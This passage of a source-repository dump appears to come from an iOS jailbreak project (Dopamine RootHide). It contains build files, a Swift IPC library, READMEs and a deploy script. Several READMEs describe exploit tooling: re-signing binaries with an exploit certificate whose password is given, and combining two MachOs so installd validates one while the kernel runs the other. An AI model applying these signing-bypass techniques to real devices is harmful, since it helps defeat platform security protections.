uint64_t pc); 30 | uint64_t aarch64_get_ldr_off(uint32_t ldrInstruction); 31 | uint64_t find_xref_to(const void * __nonnull start, const void * __nonnull end, uint64_t xrefTo, uint64_t pc); 32 | uint64_t find_xref_to_data(const void * __nonnull start, const void * __nonnull end, uint64_t xrefTo, uint64_t pc); 33 | uint64_t find_xref_branch(const void * __nonnull start, const void * __nonnull end, uint64_t xrefTo, uint64_t pc); 34 | 35 | // Also define some IOKit stuff... 36 | extern const mach_port_t kIOMasterPortDefault; 37 | 38 | extern mach_port_t IORegistryEntryFromPath(mach_port_t mainPort, const io_string_t __nonnull path); 39 | extern CFTypeRef __nullable IORegistryEntryCreateCFProperty(mach_port_t entry, CFStringRef __nonnull key, CFAllocatorRef __nullable allocator, uint32_t options); 40 | extern kern_return_t IOObjectRelease(mach_port_t object); 41 | 42 | #endif /* CFastFind_h */ 43 | -------------------------------------------------------------------------------- /Packages/ProcessCommunication/.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | /.build 3 | /*.xcodeproj 4 | xcuserdata/ 5 | DerivedData/ 6 | .swiftpm/xcode/package.xcworkspace/contents.xcworkspacedata 7 | -------------------------------------------------------------------------------- /Packages/ProcessCommunication/Package.swift: -------------------------------------------------------------------------------- 1 | // swift-tools-version:5.4 2 | // The swift-tools-version declares the minimum version of Swift required to build this package. 3 | 4 | import PackageDescription 5 | 6 | let package = Package( 7 | name: "ProcessCommunication", 8 | platforms: [ 9 | .iOS(.v14), 10 | .macOS(.v11) 11 | ], 12 | products: [ 13 | // Products define the executables and libraries a package produces, and make them visible to other packages. 14 | .library( 15 | name: "ProcessCommunication", 16 | targets: ["ProcessCommunication"]) 17 | ], 18 | targets: [ 19 | // Targets are the basic building blocks of a package. A target can define a module or a test suite. 20 | // Targets can depend on other targets in this package, and on products in packages this package depends on. 21 | .target( 22 | name: "ProcessCommunication", 23 | dependencies: []), 24 | ] 25 | ) 26 | -------------------------------------------------------------------------------- /Packages/ProcessCommunication/README.md: -------------------------------------------------------------------------------- 1 | # ProcessCommunication 2 | 3 | Simple process communication library. 4 | -------------------------------------------------------------------------------- /Packages/ProcessCommunication/Sources/ProcessCommunication/ProcessCommunication.swift: -------------------------------------------------------------------------------- 1 | // 2 | // ProcessCommunication.swift 3 | // ProcessCommunication 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2021/2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | import Foundation 10 | 11 | public class ProcessCommunication { 12 | public let read: FileHandle 13 | public let write: FileHandle 14 | 15 | public init(read: FileHandle, write: FileHandle) { 16 | self.read = read 17 | self.write = write 18 | } 19 | 20 | public func receiveCommand() -> [String]? { 21 | var result: [String] = [] 22 | var buf = Data() 23 | while true { 24 | do { 25 | let data = try read.read(upToCount: 1) 26 | if data == nil || data?.count == 0 { 27 | return nil 28 | } 29 | 30 | if data.unsafelyUnwrapped[0] == 0 { 31 | result.append(String(data: buf, encoding: .utf8) ?? "") 32 | return result 33 | } else if data.unsafelyUnwrapped[0] == 1 { 34 | result.append(String(data: buf, encoding: .utf8) ?? "") 35 | buf = Data() 36 | } else { 37 | buf += data.unsafelyUnwrapped 38 | } 39 | } catch _ { 40 | return nil 41 | } 42 | } 43 | } 44 | 45 | @discardableResult 46 | public func sendCommand(_ args: [String]) -> Bool { 47 | do { 48 | var iter = args.makeIterator() 49 | var cur = iter.next() 50 | while cur != nil { 51 | try write.write(contentsOf: cur.unsafelyUnwrapped.data(using: .utf8) ?? Data()) 52 | 53 | cur = iter.next() 54 | if cur != nil { 55 | try write.write(contentsOf: Data(repeating: 1, count: 1)) 56 | } else { 57 | try write.write(contentsOf: Data(repeating: 0, count: 1)) 58 | } 59 | } 60 | 61 | return true 62 | } catch _ { 63 | return false 64 | } 65 | } 66 | 67 | @discardableResult 68 | public func sendCommand(_ args: String...) -> Bool { 69 | sendCommand(args) 70 | } 71 | } 72 | -------------------------------------------------------------------------------- /README.dev.md: -------------------------------------------------------------------------------- 1 | # Dopamine(RootHide) 2 | 3 | RootHide is a completely hidden rootless jailbreak solution without to inject/modify/patch/hook apps. 4 | 5 | This project is the RootHide implementation based on Dopamine Jailbreak. 6 | 7 | 8 | # Progress 9 | 10 | - [x] Remove fakelib 11 | - [x] Remove bind mount 12 | - [x] Remove system-wide dyld file patch 13 | - [x] Unsandbox systemhook.dylib before injected it 14 | - [x] Randomize systemhook.dylib file name 15 | - [x] Randomize the /var/jb/ fixed path 16 | - [x] Move all stuffs from preboot to var 17 | - [x] Add jailbreak environment variable 18 | - [x] linker/loader works with randomized /var/jb/ 19 | - [x] symlinks works with randomized /var/jb/ 20 | - [x] Implements a middle layer to convert path 21 | - [x] Adapt theos tools for RootHide 22 | - [x] Original Rootless Compat Layer 23 | - [x] Adapt bootstraps for RootHide 24 | - [x] Adapt Sileo store for RootHide 25 | - [x] Adapt Zebra store for RootHide 26 | - [x] Adapt NewTerm app for RootHide 27 | - [x] Adapt Filza manager for RootHide 28 | - [x] Implement a blacklist selector app 29 | - [x] Implement a /var/-files-clean app 30 | 31 | 32 | # Credits 33 | 34 | [@opa334](https://github.com/opa334/) 35 | 36 | [@cameron](https://github.com/CRKatri) 37 | 38 | [@kirb](https://github.com/kirb) 39 | 40 | [@fugu15](https://github.com/pinauten/Fugu15) 41 | 42 | [@jakejames](https://github.com/jakeajames) 43 | 44 | [@coolstar](https://github.com/coolstar) 45 | 46 | [@procursus](https://github.com/ProcursusTeam/Procursus) 47 | 48 | [@theos](https://github.com/theos/theos) 49 | 50 | [@sileo](https://github.com/Sileo/Sileo) 51 | 52 | # Info 53 | 54 | [theos-discord-server](https://theos.dev/discord) 55 | 56 | [sileo-discrod-server](https://discord.com/invite/Udn4kQg) 57 | 58 | [chariz-discord-server](https://discord.com/invite/sEzwNF9) 59 | 60 | [procursus-discord-server](https://discord.gg/QJDrrAJPDY) 61 | 62 | 63 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Dopamine(RootHide) 2 | 3 | RootHide is a completely hidden rootless jailbreak solution without to inject/modify/patch/hook apps. 4 | 5 | This project is the RootHide implementation based on Dopamine Jailbreak. 6 | 7 | ![text](banner.png) 8 | 9 | - how to install: Download tipa file and install in trollstore, you don't have to uninstall rootless dopamine/xina15, you can switch them by rebooting the device. 10 | 11 | - how to use: after jailbreak successful, the icon of the RootHide Manager App will appear on the home screen, open it to blacklist the apps that detect jailbreak, and use varClean to clean up junk files generated by other jailbreaks/tweaks. just so simple. 12 | 13 | - about Tweaks: some tweaks have been ported to roothide. we will launch RootHidePatcher later so that some rootless tweaks can be converted into roothide tweaks. 14 | 15 | - for Developers: dear developers, many tweaks just need to be recompiled to run with roothide, or minor modifications, see the developer document: https://github.com/RootHide/Developer 16 | 17 | - for updates and support, follow [@RootHideDev](https://twitter.com/RootHideDev) on twitter or join our [Discord server](https://discord.gg/ZvY2Yjw8GA). 18 | 19 | special thanks to: @opa334 @theosdev @ProcursusTeam @eveyineee @jakeashacks 20 | 21 | # More Info 22 | 23 | - RootHide Discord Server: https://discord.gg/ZvY2Yjw8GA 24 | 25 | - Havoc Discord Server: https://discord.gg/s2zc45h 26 | 27 | - Chariz Discord Server: https://discord.gg/sEzwNF9 28 | 29 | - Zebra Discord Server: https://discord.gg/6CPtHBU 30 | 31 | - Sileo Discrod Server: https://discord.gg/Udn4kQg 32 | 33 | -------------------------------------------------------------------------------- /Tools/Exe2Driver/.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | /.build 3 | /*.xcodeproj 4 | xcuserdata/ 5 | DerivedData/ 6 | .swiftpm/xcode/package.xcworkspace/contents.xcworkspacedata 7 | -------------------------------------------------------------------------------- /Tools/Exe2Driver/Exe2Driver: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Tools/Exe2Driver/Exe2Driver -------------------------------------------------------------------------------- /Tools/Exe2Driver/Makefile: -------------------------------------------------------------------------------- 1 | TARGET=Exe2Driver 2 | CONFIG=release 3 | 4 | include ../Makefile.inc 5 | -------------------------------------------------------------------------------- /Tools/Exe2Driver/Package.resolved: -------------------------------------------------------------------------------- 1 | { 2 | "object": { 3 | "pins": [ 4 | { 5 | "package": "SwiftMachO", 6 | "repositoryURL": "https://github.com/pinauten/SwiftMachO", 7 | "state": { 8 | "branch": "master", 9 | "revision": "d433b349d7e69bb8fd5d18ea5cdbcd8b731ddf55", 10 | "version": null 11 | } 12 | }, 13 | { 14 | "package": "SwiftUtils", 15 | "repositoryURL": "https://github.com/pinauten/SwiftUtils", 16 | "state": { 17 | "branch": "master", 18 | "revision": "1d37faabb4c58b3152394c9b6e1c1a68507646b9", 19 | "version": null 20 | } 21 | } 22 | ] 23 | }, 24 | "version": 1 25 | } 26 | -------------------------------------------------------------------------------- /Tools/Exe2Driver/Package.swift: -------------------------------------------------------------------------------- 1 | // swift-tools-version:5.3 2 | // The swift-tools-version declares the minimum version of Swift required to build this package. 3 | 4 | import PackageDescription 5 | 6 | let package = Package( 7 | name: "Exe2Driver", 8 | platforms: [ 9 | .macOS(.v11) 10 | ], 11 | products: [ 12 | // Products define the executables and libraries a package produces, and make them visible to other packages. 13 | .executable( 14 | name: "Exe2Driver", 15 | targets: ["Exe2Driver"]), 16 | ], 17 | dependencies: [ 18 | // Dependencies declare other packages that this package depends on. 19 | .package(name: "SwiftUtils", url: "https://github.com/pinauten/SwiftUtils", .branch("master")), 20 | .package(name: "SwiftMachO", url: "https://github.com/pinauten/SwiftMachO", .branch("master")) 21 | ], 22 | targets: [ 23 | // Targets are the basic building blocks of a package. A target can define a module or a test suite. 24 | // Targets can depend on other targets in this package, and on products in packages this package depends on. 25 | .target( 26 | name: "Exe2Driver", 27 | dependencies: ["SwiftUtils", "SwiftMachO"]) 28 | ] 29 | ) 30 | -------------------------------------------------------------------------------- /Tools/Exe2Driver/README.md: -------------------------------------------------------------------------------- 1 | # Exe2Driver 2 | 3 | Exe2Driver can be used to convert a regular executable into a DriverKit driver which can then be launched using SpawnDrv/kexploitd. 4 | -------------------------------------------------------------------------------- /Tools/Makefile: -------------------------------------------------------------------------------- 1 | TARGETS=fastPathSign BuildVFS Exe2Driver installHaxx 2 | TARGETS_CLEAN=$(addsuffix _clean, $(TARGETS)) 3 | TARGETS_BUILD_CLEAN=$(addsuffix _build_clean, $(TARGETS)) 4 | 5 | all: $(TARGETS) 6 | clean: $(TARGETS_CLEAN) 7 | build_clean: $(TARGETS_BUILD_CLEAN) 8 | 9 | .PHONY: all clean build_clean 10 | 11 | $(TARGETS): FORCE 12 | @echo make -C $@ 13 | @$(MAKE) -C $@ 14 | 15 | $(TARGETS_CLEAN): FORCE 16 | @echo make -C $(@:_clean=) clean 17 | @$(MAKE) -C $(@:_clean=) clean 18 | 19 | $(TARGETS_BUILD_CLEAN): FORCE 20 | @echo make -C $(@:_build_clean=) build_clean 21 | @$(MAKE) -C $(@:_build_clean=) build_clean 22 | 23 | FORCE: ; 24 | -------------------------------------------------------------------------------- /Tools/Makefile.inc: -------------------------------------------------------------------------------- 1 | SWIFT_BUILD_ARGS=-c $(CONFIG) 2 | 3 | SWIFT_BUILD_ARGS_X86_64=$(SWIFT_BUILD_ARGS) -Xswiftc -target -Xswiftc x86_64-apple-macos12.0 4 | SWIFT_BUILD_ARGS_ARM64=$(SWIFT_BUILD_ARGS) -Xswiftc -target -Xswiftc arm64-apple-macos12.0 5 | 6 | all: $(TARGET) 7 | 8 | build_clean: 9 | rm -rf .build_x86_64 .build_arm64 10 | 11 | clean: build_clean 12 | rm -f $(TARGET) 13 | 14 | .PHONY: all build_clean clean 15 | 16 | .build_x86_64/$(CONFIG)/$(TARGET): FORCE 17 | swift build --build-path .build_x86_64 $(SWIFT_BUILD_ARGS_X86_64) 18 | 19 | .build_arm64/$(CONFIG)/$(TARGET): FORCE 20 | swift build --build-path .build_arm64 $(SWIFT_BUILD_ARGS_ARM64) 21 | 22 | $(TARGET): .build_x86_64/$(CONFIG)/$(TARGET) .build_arm64/$(CONFIG)/$(TARGET) 23 | lipo -create .build_x86_64/$(CONFIG)/$(TARGET) .build_arm64/$(CONFIG)/$(TARGET) -output $(TARGET) 24 | 25 | FORCE: ; 26 | -------------------------------------------------------------------------------- /Tools/fastPathSign/.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | /.build 3 | /*.xcodeproj 4 | xcuserdata/ 5 | DerivedData/ 6 | .swiftpm/xcode/package.xcworkspace/contents.xcworkspacedata 7 | -------------------------------------------------------------------------------- /Tools/fastPathSign/Makefile: -------------------------------------------------------------------------------- 1 | TARGET=fastPathSign 2 | CONFIG=release 3 | 4 | include ../Makefile.inc 5 | -------------------------------------------------------------------------------- /Tools/fastPathSign/Package.swift: -------------------------------------------------------------------------------- 1 | // swift-tools-version:5.4 2 | // The swift-tools-version declares the minimum version of Swift required to build this package. 3 | 4 | import PackageDescription 5 | 6 | let package = Package( 7 | name: "fastPathSign", 8 | platforms: [ 9 | .macOS(.v11) 10 | ], 11 | products: [ 12 | // Products define the executables and libraries a package produces, and make them visible to other packages. 13 | .executable( 14 | name: "fastPathSign", 15 | targets: ["fastPathSign"]), 16 | ], 17 | targets: [ 18 | // Targets are the basic building blocks of a package. A target can define a module or a test suite. 19 | // Targets can depend on other targets in this package, and on products in packages this package depends on. 20 | .systemLibrary(name: "Security_Codesign"), 21 | .executableTarget( 22 | name: "fastPathSign", 23 | dependencies: ["Security_Codesign"]) 24 | ] 25 | ) 26 | -------------------------------------------------------------------------------- /Tools/fastPathSign/README.md: -------------------------------------------------------------------------------- 1 | # fastPathSign 2 | 3 | fastPathSign is a tool to re-sign MachO's with the fastPath exploit cert. 4 | 5 | # Prerequisites 6 | 7 | Make sure you imported the fastPath exploit certificate into your Keychain (Exploits/fastPath/arm.pfx, password: "password"). 8 | The certificate must be named "Pinauten PWN Cert". 9 | 10 | # Usage 11 | 12 | First ad-hoc sign the MachO, including the entitlements you need. 13 | Then run `fastPathSign ` to re-sign your MachO. This will keep the entitlements, identifier, etc. 14 | -------------------------------------------------------------------------------- /Tools/fastPathSign/Sources/Security_Codesign/module.modulemap: -------------------------------------------------------------------------------- 1 | module Security_Codesign [system] { 2 | header "SecCodeSigner.h" 3 | } 4 | -------------------------------------------------------------------------------- /Tools/fastPathSign/fastPathSign: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Tools/fastPathSign/fastPathSign -------------------------------------------------------------------------------- /Tools/installHaxx/.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | /.build 3 | /*.xcodeproj 4 | xcuserdata/ 5 | DerivedData/ 6 | .swiftpm/xcode/package.xcworkspace/contents.xcworkspacedata 7 | -------------------------------------------------------------------------------- /Tools/installHaxx/Makefile: -------------------------------------------------------------------------------- 1 | TARGET=installHaxx 2 | CONFIG=release 3 | 4 | include ../Makefile.inc 5 | -------------------------------------------------------------------------------- /Tools/installHaxx/Package.resolved: -------------------------------------------------------------------------------- 1 | { 2 | "object": { 3 | "pins": [ 4 | { 5 | "package": "SwiftMachO", 6 | "repositoryURL": "https://github.com/pinauten/SwiftMachO", 7 | "state": { 8 | "branch": "master", 9 | "revision": "d433b349d7e69bb8fd5d18ea5cdbcd8b731ddf55", 10 | "version": null 11 | } 12 | }, 13 | { 14 | "package": "SwiftUtils", 15 | "repositoryURL": "https://github.com/pinauten/SwiftUtils", 16 | "state": { 17 | "branch": "master", 18 | "revision": "1d37faabb4c58b3152394c9b6e1c1a68507646b9", 19 | "version": null 20 | } 21 | } 22 | ] 23 | }, 24 | "version": 1 25 | } 26 | -------------------------------------------------------------------------------- /Tools/installHaxx/Package.swift: -------------------------------------------------------------------------------- 1 | // swift-tools-version:5.4 2 | // The swift-tools-version declares the minimum version of Swift required to build this package. 3 | 4 | import PackageDescription 5 | 6 | let package = Package( 7 | name: "installHaxx", 8 | platforms: [ 9 | .iOS(.v14), 10 | .macOS(.v11) 11 | ], 12 | products: [ 13 | // Products define the executables and libraries a package produces, and make them visible to other packages. 14 | .executable( 15 | name: "installHaxx", 16 | targets: ["installHaxx"]), 17 | ], 18 | dependencies: [ 19 | // Dependencies declare other packages that this package depends on. 20 | .package(name: "SwiftUtils", url: "https://github.com/pinauten/SwiftUtils", .branch("master")), 21 | .package(name: "SwiftMachO", url: "https://github.com/pinauten/SwiftMachO", .branch("master")) 22 | ], 23 | targets: [ 24 | // Targets are the basic building blocks of a package. A target can define a module or a test suite. 25 | // Targets can depend on other targets in this package, and on products in packages this package depends on. 26 | .executableTarget( 27 | name: "installHaxx", 28 | dependencies: ["SwiftUtils", "SwiftMachO"]), 29 | ] 30 | ) 31 | -------------------------------------------------------------------------------- /Tools/installHaxx/README.md: -------------------------------------------------------------------------------- 1 | # installHaxx 2 | 3 | Tool to combine two MachO's. When installing an iOS App containing an executable created by this tool, installd will validate the first MachO while the kernel will execute the second one. 4 | -------------------------------------------------------------------------------- /Tools/installHaxx/installHaxx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Tools/installHaxx/installHaxx -------------------------------------------------------------------------------- /banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/banner.png -------------------------------------------------------------------------------- /jbupdate.sh: -------------------------------------------------------------------------------- 1 | DEVICE=root@iphone11.local 2 | PORT=22 3 | 4 | ssh $DEVICE -p $PORT "rm -rf /rootfs/var/mobile/Documents/Dopamine.tipa" 5 | scp -P$PORT ./Dopamine/Dopamine.tipa $DEVICE:/rootfs/var/mobile/Documents/Dopamine.tipa 6 | ssh $DEVICE -p $PORT "/var/jb/basebin/jbctl update tipa /var/mobile/Documents/Dopamine.tipa" --------------------------------------------------------------------------------